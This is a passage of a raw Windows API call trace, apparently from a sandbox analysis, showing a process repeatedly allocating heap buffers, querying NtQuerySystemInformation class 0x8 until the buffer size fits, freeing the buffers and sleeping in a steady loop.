SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0300.907] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0300.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0300.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0300.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0300.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.909] Sleep (dwMilliseconds=0x110) [0300.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0300.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0300.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0300.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0300.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0300.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0300.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0300.922] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0300.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.923] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.923] Sleep (dwMilliseconds=0x110) [0300.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0300.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0300.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0300.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0300.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0300.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0300.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0300.937] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0300.938] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.938] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.938] Sleep (dwMilliseconds=0x110) [0300.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0300.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0300.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0300.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0300.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0300.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0300.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0300.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0300.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.957] Sleep (dwMilliseconds=0x110) [0300.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0300.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0300.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0300.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0300.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0300.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0300.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0300.973] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0300.974] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.974] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.974] Sleep (dwMilliseconds=0x110) [0300.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0300.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0300.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0300.985] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0300.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0300.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0300.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0300.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0300.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0300.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0300.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0300.992] Sleep (dwMilliseconds=0x110) [0300.997] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0300.997] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0300.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0300.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0300.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0301.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0301.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0301.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0301.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0301.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.004] Sleep (dwMilliseconds=0x110) [0301.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0301.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0301.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0301.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0301.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0301.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0301.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0301.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0301.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.019] Sleep (dwMilliseconds=0x110) [0301.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0301.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0301.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0301.033] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0301.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0301.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0301.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0301.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0301.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.035] Sleep (dwMilliseconds=0x110) [0301.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0301.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0301.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0301.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0301.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0301.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0301.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0301.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0301.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.050] Sleep (dwMilliseconds=0x110) [0301.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0301.064] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0301.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0301.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.065] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0301.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0301.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0301.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0301.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0301.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.067] Sleep (dwMilliseconds=0x110) [0301.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0301.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0301.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0301.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0301.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0301.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0301.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0301.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0301.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.082] Sleep (dwMilliseconds=0x110) [0301.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0301.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0301.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0301.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0301.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0301.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0301.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.098] Sleep (dwMilliseconds=0x110) [0301.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0301.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0301.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0301.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0301.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0301.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0301.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0301.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0301.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.109] Sleep (dwMilliseconds=0x110) [0301.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 